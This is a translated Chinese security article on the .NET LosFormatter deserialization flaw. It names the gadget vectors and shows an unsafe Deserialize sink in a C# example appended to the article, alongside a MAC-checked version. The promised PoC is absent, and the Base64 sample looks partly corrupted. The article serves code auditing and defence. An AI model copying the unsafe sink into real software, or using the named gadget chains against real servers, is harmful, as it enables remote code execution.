myhack58 MYHACK58:62201993736 (www.myhack58.com)
Author: 佚名 (anonymous)
Published: Apr 18, 2019 - 12:00 a.m.

.NET advanced code audit, lesson 11: LosFormatter deserialization vulnerability - vulnerability warning - 黑吧安全网 (myhack58)

CVSS3: 8.1 High (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
Attack Vector: NETWORK; Attack Complexity: HIGH; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

CVSS2: 9.3 High (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Access Vector: NETWORK; Access Complexity: MEDIUM; Authentication: NONE; Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE

EPSS: 0.198 Low (Percentile 95.9%)

LosFormatter is generally used to serialize and deserialize the view state (ViewState) of a Web Forms page. If the ViewState is to be persisted in a database or another storage device, the LosFormatter class is required to serialize and deserialize it. It is encapsulated in System.Web.dll, in the namespace System.Web.UI. Microsoft's documentation describes it as the Limited Object Serialization (LOS) format, a highly compact ASCII serialization format, and the class supports serializing any object graph. Deserializing untrusted data with it, however, results in a deserialization vulnerability that allows remote code execution (RCE). This article describes and reproduces the issue from the principle and code-audit perspectives.

0x01 LosFormatter serialization
The LosFormatter class is typically used to serialize the page's ViewState. The following example illustrates the problem. First, define the TestClass object:
![](/Article/UploadPic/2019-4/2019418145413660.png)
It defines three members and implements a static method, ClassMethod, that starts a process. Serialization is done by creating an object instance and assigning values to the members:
![](/Article/UploadPic/2019-4/2019418145413756.png)
In the usual case, calling Serialize yields the serialized content, which is Base64 encoded:
/wEypgEAAQAAAP////8BAAAAAAAAAAwCAAAAPldwZkFwcDEsIFzlcnnpb249ms4wljaumcwgq3vsdhvyzt1uzxv0cmfslcbqdwjsawnlzxlub2tlbj1udwxsbqeaaaarv3bmqxbwms5uzxn0q2xhc3mdaaaacwnsyxnzbmftzqruyw1la2fnzqebaagcaaaabgmaaaadmzywbgqaaaahsxzhbjflzriaaaal

0x02 LosFormatter deserialization
2.1 Deserialization usage
Deserialization converts the Base64-encoded data back into an object by creating a new LosFormatter and calling its Deserialize method. A view is defined as follows:
![](/Article/UploadPic/2019-4/2019418145413502.png)
The author creates a new object and calls the Deserialize method; the concrete implementation can be seen below:
![](/Article/UploadPic/2019-4/2019418145414139.png)
After Deserialize, the value of the Name member of TestClass is obtained:
![](/Article/UploadPic/2019-4/2019418145414703.png)
2.2 Attack vector: ActivitySurrogateSelector
Since the principle of this vulnerability was introduced earlier, this article does not repeat it; readers who have not seen it should refer to ".NET advanced code audit, lesson 8: SoapFormatter deserialization vulnerability". The difference is that the LosFormatter class is used to serialize the data; the custom code is likewise reached by overriding ISerializationSurrogate to obtain the serialized data:
![](/Article/UploadPic/2019-4/2019418145414880.png)
Deserializing it with LosFormatter's Deserialize method in the usual way successfully launches the calculator.
![](/Article/UploadPic/2019-4/2019418145414504.png)
![](/Article/UploadPic/2019-4/2019418145414845.png)
2.3 Attack vector: PSObject
Because the author's Windows host has the patch for CVE-2017-8565 (Windows PowerShell remote code execution vulnerability) installed, the attempt was unsuccessful, so it is not discussed in depth here; interested readers can research it on their own. For details of the patch, see:
https://support.microsoft.com/zh-cn/help/4025872/windows-powershell-remote-code-execution-vulnerability
2.4 Attack vector: MulticastDelegate
Since the principle of this vulnerability was introduced earlier, this article does not repeat it; readers who have not seen it should refer to ".NET advanced code audit, lesson 7: NetDataContractSerializer deserialization vulnerability".

0x03 Code audit perspective
3.1 Deserialize
From the code audit angle, the entry point to look for is Deserialize. It has two overloads, which deserialize Stream and string data respectively; the string can be a raw string or a Base64 string read from a file, and both deserialize successfully in practice.
The following is unsafe code:
![](/Article/UploadPic/2019-4/2019418145414943.png)
An attacker only needs to control the incoming string parameter Content to carry out a deserialization attack. The complete PoC is as follows:
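As an added illustration (not the page's own code and not its PoC), the following C# shows the Serialize round-trip from 0x01 and the Deserialize sink from 3.1 next to its MAC-checked form. It assumes an ASP.NET application with a configured <machineKey>, the LosFormatter(bool enableMac, string macKeyModifier) constructor, and constructed member names and values for TestClass.

```csharp
using System;
using System.IO;
using System.Web.UI;   // LosFormatter lives in System.Web.dll; reference System.Web

// Constructed stand-in for the page's TestClass (member names here are assumed).
[Serializable]
public class TestClass
{
    public string Name { get; set; }
    public int Age { get; set; }
    public string Address { get; set; }
    public static void ClassMethod() { Console.WriteLine("ClassMethod called"); }
}

public static class LosFormatterDemo
{
    // 0x01: Serialize writes the Base64 LOS string seen on the page.
    public static string Serialize(object graph, bool enableMac)
    {
        var lf = new LosFormatter(enableMac, "viewstate-demo");  // modifier string is assumed
        using (var sw = new StringWriter())
        {
            lf.Serialize(sw, graph);
            return sw.ToString();
        }
    }
    // 3.1: the sink a code audit looks for. The string comes straight from the caller
    // (request, database, file) and reaches Deserialize with no integrity check.
    public static object UnsafeDeserialize(string untrusted)
    {
        return new LosFormatter().Deserialize(untrusted);
    }
    // Hardened form: with enableMac=true, Deserialize verifies the HMAC keyed by the
    // application's <machineKey> validationKey and throws on a modified payload.
    public static object MacCheckedDeserialize(string input)
    {
        return new LosFormatter(true, "viewstate-demo").Deserialize(input);
    }
    public static void Main()
    {
        var original = new TestClass { Name = "dotNet", Age = 30, Address = "Guangzhou" };
        string protectedState = Serialize(original, enableMac: true);
        Console.WriteLine(((TestClass)MacCheckedDeserialize(protectedState)).Name);

        // Flip one character: the MAC check fails before any object graph is built.
        string tampered = "A" + protectedState.Substring(1);
        try { MacCheckedDeserialize(tampered); }
        catch (Exception e) { Console.WriteLine("rejected: " + e.GetType().Name); }
    }
}
```

The MAC only helps while the validationKey stays secret and is not a default or published value; with a leaked key the MAC can be forged and the check adds nothing, so the only robust rule is to never pass caller-controlled data to Deserialize.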

